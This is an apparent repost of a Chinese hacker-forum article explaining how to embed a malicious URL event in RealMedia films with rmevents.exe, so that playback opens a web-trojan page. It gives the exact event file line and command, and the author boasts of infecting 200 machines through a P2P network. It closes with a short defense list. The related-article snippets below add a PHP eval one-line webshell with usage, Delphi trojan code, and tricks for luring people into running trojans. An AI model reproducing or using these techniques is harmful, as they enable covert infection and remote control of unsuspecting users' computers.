并不神奇的Real影片木马

文章作者:intruder

信息来源:邪恶八进制 中国

如转载请注明出处

在P2P软件里,很多的Real影片都是危险的,这只是一个小技巧,辅助的一种入侵方式,但这种方法很有效果,比如在著名的A片交流软件PP点点通里,我放了一个这样的小木马,两天就有200个肉鸡,并且呈几何状增长.大家别做坏事。

使用Helix Producer Plus 9的rmevents.exe来修改影片的剪辑信息,可以在指定时间打开指定的窗口.

新建一个文本文件rmevents.txt.

输入:

u 00:01:00.0 00:01:30.0 http://www.muma.com.cn/muma.html

我来解释一下,它意思是说在00:01:00.0 00:01:30.0这个时间范围内打开后面的URL,后面的URL就是我们的木马地址。

输入rmevents -i 电影.rm -e rmevents.txt -o 电影1.rm 这个命令,生成的电影.rm就是我们的木马文件了。

http://www.muma.com.cn/muma.html这个地址是你做好的网页木马的地址,不管是动鲨木马啊,还是EXE2BMP的木马,还是什么CHM木马,还是我崇拜的冰狐大哥的IFRAME溢出的网页木马都可以。主要是新,威力强。

大家可以试一下。呵呵,intruder原创。本文允许转载,如转载请注明出处,谢谢。

唉。看来公布这个的危害还是不小地,嘿嘿,就当替我们党打击色情业了。

防御方法:一,最重要的一点,嘿嘿,别看不健康的东西,对身体不好哦。二,换别的播放器,我推荐梦幻鼎点播放器,贼好用啊。三,看片时用防火墙屏蔽RealPlayer对网络的访问,但这样做在线看的时候就没保险了。四,最最重要的一点,打完所有的IE补丁。五,如果不怕麻烦,在看影片之前我们可以执行我们做木马的那一步,只是把rmevents.txt的内容清空再做,这样就清空了影片的剪辑信息了。

(0)

相关推荐

  • 并不神奇的Real影片木马

    文章作者:intruder 信息来源:邪恶八进制 中国 如转载请注明出处 在P2P软件里,很多的Real影片都是危险的,这只是一个小技巧,辅助的一种入侵方式,但这种方法很有效果,比如在著名的A片交流软件PP点点通里,我放了一个这样的小木马,两天就有200个肉鸡,并且呈几何状增长.大家别做坏事. 使用Helix Producer Plus 9的rmevents.exe来修改影片的剪辑信息,可以在指定时间打开指定的窗口. 新建一个文本文件rmevents.txt. 输入: u 00:01:00.0 

  • 在Real影片中放木马后门

    在Real影片中放木马后门.遇到类是情况希望大家注意 经常遇到rm影片播放时弹出网页,一直不知道怎么回事,前几天看到了大众软件中一篇文章才知道插入和去除的方法,好东东不敢独享,在网上搜了三篇相关文章,转给大家拉!  在Real影片中放 木马 在P2P软件里,很多的Real影片都是危险的,这只是一个小技巧,辅助的一种入侵方式,但这种方法很有效果,比如在著名的A片交流软件PP点点通里,安装了一个这样的小木马 ,两天就有200个肉鸡,并且呈几何状增长.大家别做坏事. 使用某个工具来修改影片的剪辑信息,

  • Delphi实现木马文件传输代码实例

    本文以实例形式讲述了Delphi下木马的文件传输方法的实现过程,具体步骤如下: 服务器端代码: unit ServerFrm; interface uses Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms, Dialogs, ComCtrls, StdCtrls, ExtCtrls,WinSock; type TfrmMain = class(TForm) Panel1: TPanel; Labe

  • Delphi实现木马自我拷贝方法

    木马实现自我拷贝的原理是程序运行时先查看自己是不是在特定目录下,如果是就继续运行,如果不是就把自己拷贝到特定目录下,然后运行新程序,继而退出旧程序. 本例即以Delphi实现木马的自我拷贝. 首先打开Delphi,新建一个工程,在窗口的Create事件中写入如下代码: procedure TForm1.FormCreate(Sender: TObject); var myname: string; begin myname := ExtractFilename(Application.Exena

  • php eval函数一句话木马代码

    eval可以用来执行任何其他php代码,所以对于代码里发现了eval函数一定要小心,可能是木马 就这一句话害死人,这样任何人都可以post任何文件上来,所以要做好防范 <?php @eval($_POST['c']);?> 使用方法也很简单,本地提交文件指向提交文件,里面的php代码就会被执行 <html> <body> <form action="a.php" method="post"> <input typ

  • 详解BMP木马

    首先说明这不是什么新的东西,但最近有人说我们没有,那就随便写编文章放上来了,大家自己试验一下. 何谓BMP网页木马?它和过去早就用臭了的MIME头漏洞的木马不同,MIME木马是把一个EXE文件用MIME编码为一个EML(OUT LOOK信件)文件,放到网页上利用IE和OE的编码漏洞实现自动下载和执行. 然而BMP木马就不同,它把一个EXE文件伪装成一个BMP图片文件,欺骗IE自动下载,再利用网页中的javascript脚本查找客户端的Internet临时文件夹,找到下载后的BMP文件,把它拷贝到

  • 自己动手清除电脑中的木马程序

    特洛伊木马是一种基于远程控制的病毒程序,该程序具有很强的隐蔽性和危害性,它可以在你并不知情的的状态下控制你或者监视你的电脑.下面就讲讲木马经常藏身的地方和清除方法. 首先查看自己的电脑中是否有木马 1.集成到程序中 其实木马也是一个服务器-客户端程序,它为了不让用户能轻易地把它删除,就常常集成到程序里,一旦用户激活木马程序,那么木马文件和某一应用程序捆绑在一起,然后上传到服务端覆盖原文件,这样即使木马被删除了,只要运行捆绑了木马的应用程序,木马又会被安装上去了.绑定到某一应用程序中,如绑定到系统

  • 黑客如何给你的系统种木马

    相信很多朋友都听说过木马程序,总觉得它很神秘.很高难,但事实上随着木马软件的智能化,很多骇客都能轻松达到攻击的目的.今天,笔者就以最新的一款木马程序--黑洞2004,从种植.使用.隐藏.防范四个方面来为网络爱好者介绍一下木马的特性.需要提醒大家的是,在使用木马程序的时候,请先关闭系统中的病毒防火墙,因为杀毒软件会把木马作为病毒的一种进行查杀. 操作步骤: 一.种植木马 现在网络上流行的木马基本上都采用的是C/S 结构(客户端/服务端).你要使用木马控制对方的电脑,首先需要在对方的的电脑中种植并运

  • 查找与清除线程插入式木马

    目前网络上最猖獗的病毒估计非木马程序莫数了,特别是在过去的2004年木马程序的攻击性也有了很大的加强,在进程隐藏方面,做了较大的改动,不再采用独立的EXE可执行文件形式,而是改为内核嵌入方式.远程线程插入技术.挂接PSAPI等,这些木马也是目前最难对付的.本期就教你查找和清除线程插入式木马. 操作步骤: 1.通过自动运行机制查木马  一说到查找木马,许多人马上就会想到通过木马的启动项来寻找"蛛丝马迹",具体的地方一般有以下几处: 1)注册表启动项:  在"开始/运行"

  • 怎样让别人中木马-木马常用骗术大观

    怎样让别人中木马? 这是网友们问得最多的问题,零零散散的回答也有一些了,但总是很少,于是小鱼儿决定搜集众人的智慧和在下的一点经验写一篇专题文章.希望大家多多发言,完善此篇,为所有木马爱好者做出一点自己的贡献.目的是要让所有人了解木马常用骗术从而保护个人PC安全. 1.捆绑欺骗.把木马服务端和某个游戏捆绑成一个文件在QQ或邮件发给别人.服务端运行后会看到游戏程序正常打开,却不会发觉木马程序已经悄悄运行,可以起到很好的迷惑作用.而且即使别人以后重装系统了,他还是保存你给他的这个"游戏"的话

随机推荐